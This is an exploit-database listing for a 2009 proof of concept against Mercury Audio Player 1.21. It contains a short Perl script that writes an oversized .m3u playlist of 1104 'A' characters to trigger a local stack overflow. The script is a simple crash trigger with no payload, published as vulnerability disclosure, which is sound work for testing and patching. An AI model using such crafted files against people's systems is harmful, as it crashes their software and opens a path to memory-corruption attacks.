Lucene search

K
exploitdbSirGodEDB-ID:8578
HistoryApr 30, 2009 - 12:00 a.m.

Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)

2009-04-3000:00:00
SirGod
www.exploit-db.com
20

AI Score

7.4

Confidence

Low

###################################################################################
####      Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC      #####
####       Discovered by SirGod  -  www.mortal-team.net                       #####
###################################################################################
my $chars= "A" x 1104;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";

# milw0rm.com [2009-04-30]

AI Score

7.4

Confidence

Low

Related for EDB-ID:8578